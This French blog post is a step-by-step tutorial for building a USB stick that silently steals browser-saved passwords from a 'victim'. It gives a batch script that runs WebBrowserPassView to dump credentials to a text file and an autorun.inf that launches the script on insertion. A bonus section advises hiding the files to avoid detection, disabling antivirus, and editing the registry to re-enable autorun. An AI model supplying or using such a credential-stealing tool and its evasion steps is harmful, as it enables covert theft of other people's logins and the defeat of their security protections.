Créons une clé USB voleuse de mot de passe

Salut les lecteur et on se retrouve pour ce nouveau post de blog ou je vais vous montrer comment configurer sa propre clé USB voleuse de mot de passe. Si vous êtes prêt allons y. Cette clé USB s’exécute automatiquement et récupère la plupart des mots de passe stockée sur le navigateur de la victime. Il peut être aussi vraiment utile surtout quand on a perdu ou oublié ses mots de passe.

Prérequis• Avoir une clé USB en bon état et de préférence d'une capacité entre 1 ou 4 giga.
• Avoir quelques notions en programmation Batch (Cmd).

ETAPE 01 : Le téléchargement

Pour récupérer les mots de passe nous aurons besoin d'un petit logiciel: WebBrowserPassView.exe Disponible sur ce bouton
Télécharger
Une fois que vous l'aurez téléchargé, vous pouvez insérer votre clé USB sur la machine. Ensuite copier le logiciel téléchargé sur la clé.

ETAPE 02 : Le fichier Batch

Maintenant nous allons créer un script en Batch qui va permettre d'exécuter notre logiciel afin de voler les identifiants et mots de passe et va stocker les données dans un fichier texte. 1/ Créer un nouveau fichier via Notepad (ou un autre éditeur) et enregistrer le fichier que vous venez de créer sous l'extension .bat (très important) 2/ Ecriver les lignes de commande suivante dans le fichier Batch que vous venez de créer :

 @echo off
 start WebBrowserPassView.exe /stext password.txt

Explication du script :

start WebBrowserPassView.exe : va lancer le logiciel qui va récupérer nos mots de passe /stext password.txt : va enregistrer tout ce qu'il va trouver dans un fichier texte nommer "password txt" 3/ Une fois finit vous pouvez sauvegarder et fermer le fichier.

ETAPE 03 : L'autorun

Un fichier autorun permet d’automatiser le lancement de certains programmes lors de l’insertion d’un périphérique de stockage (CD, Clé USB, etc.), bref c'est l'autorun qui va nous permettre d'exécuter directement la clé dès son insertion. Maintenant nous allons créer le fichier autorun. 1/ Créer un nouveau fichier via Notepad où tout autre éditeur et enregistrer le fichier que vous venez de créer sous l'extension .inf (très important aussi) 2/ Ecriver les lignes de commande suivante dans le fichier que vous venez de créer :

 [autorun]
 open=nom_du_fichier.bat
 

Explication du script :

[autorun] : syntaxe obligatoire pour créer un autorun open=nom_du_fichier.bat : va permettre dès que la clé est insérée de lancer immédiatement le fichier batch qui contient le script qui vole les données (surtout ne pas oubliez l'extension .bat) 3/ Une fois finit vous pouvez sauvegarder et fermer le fichier.

FIN Votre clé USB Rootkit est maintenant prête Il ne vous reste plus qu’à la tester sur votre machine.

🎁BONUS :

• Pour ne pas être grillé vous pouvez cacher tous les fichiers sur la clé.
Problèmes possibles : 1/ des fois les antivirus signalent l'autorun comme un virus donc penser à désactiver votre antivirus, si vous voulez le tester. 2/ Sur certain ordinateur l’autorun est désactivé. Pour activer l’autorun, aller dans Exécuter (Windows+R) puis taper regedit.exe Dans l’arborescence de la base de registres aller dans : HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft /Windows /CurrentVersion modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun»=dword: 00000091 puis redémarre le PC.
Source de l'article
  • A+
  • A-